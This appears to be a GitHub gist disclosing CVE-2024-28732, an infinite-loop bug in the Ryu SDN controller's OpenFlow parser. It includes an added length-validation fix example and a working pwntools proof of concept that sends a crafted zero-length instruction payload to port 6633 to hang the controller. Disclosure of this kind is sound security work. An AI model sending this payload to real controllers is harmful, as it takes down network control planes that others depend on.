@ErodedElk
Last active March 30, 2024 05:46
CVE-2024-28732-Ref

CVE-2024-28732

In /ryu/ofproto/ofproto_v1_3_parser.py, at about line 1050:

class OFPFlowMod(MsgBase):
....
        while offset < msg_len:
            i = OFPInstruction.parser(buf, offset)
            instructions.append(i)
            offset += i.len
        msg.instructions = instructions

If a parsed OFPInstruction has len = 0, offset never advances and the parser falls into an infinite loop.
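One way to guard a loop of this shape, as an added example that is not Ryu's code or its actual fix: the hypothetical helper `parse_instructions` reads the instruction header (type, len) itself and rejects a declared length that is smaller than the header or runs past the message. The 4-byte header layout and the sample byte strings are assumptions constructed for illustration.

```python
import struct

# Assumed generic instruction header: type (uint16), len (uint16), big-endian.
_HEADER = struct.Struct("!HH")


class MalformedInstruction(ValueError):
    """Raised when an instruction's declared length cannot be trusted."""


def parse_instructions(buf, offset, msg_len):
    """Walk the instructions in buf[offset:msg_len], validating every length.

    Hypothetical standalone helper; returns a list of (type, len, body) tuples.
    """
    if msg_len > len(buf):
        raise MalformedInstruction("msg_len exceeds the received buffer")
    instructions = []
    while offset < msg_len:
        remaining = msg_len - offset
        if remaining < _HEADER.size:
            raise MalformedInstruction("truncated header at offset %d" % offset)
        type_, length = _HEADER.unpack_from(buf, offset)
        # len == 0 would leave offset unchanged forever; any value below the
        # header size is equally meaningless, so reject both before advancing.
        if length < _HEADER.size:
            raise MalformedInstruction(
                "len %d at offset %d is below the header size" % (length, offset))
        # A length that overruns the message would read bytes that are not there.
        if length > remaining:
            raise MalformedInstruction(
                "len %d at offset %d overruns the message" % (length, offset))
        body = bytes(buf[offset + _HEADER.size:offset + length])
        instructions.append((type_, length, body))
        offset += length  # guaranteed to make progress
    return instructions


# Constructed sample inputs (not taken from the page).
GOTO_TABLE = struct.pack("!HHB3x", 1, 8, 1)  # type=1, len=8, table_id=1
ZERO_LEN = struct.pack("!HH4x", 1, 0)        # type=1, len=0: must be rejected
OVERRUN = struct.pack("!HH4x", 1, 64)        # len=64 inside an 8-byte message
```

The same check belongs in every loop that advances by a length field taken from the wire, so a malformed message ends in an error the controller can log and drop instead of a spinning parser.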

Reproduction

Start the controller with the following command:

ryu-manager

PoC:

from pwn import *
p=remote("0.0.0.0",6633)
payload=b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()

Executing the PoC causes the controller to fall into an infinite loop and stop working.

The same problem occurs at the following locations:

/ryu/ofproto/ofproto_v1_3_parser.py about line=1050

/ryu/ofproto/ofproto_v1_4_parser.py about line=4453

/ryu/ofproto/ofproto_v1_3_parser.py about line=5321

These affect OpenFlow 1.3, OpenFlow 1.4 and OpenFlow 1.5.

Version

Affected versions: v4.34
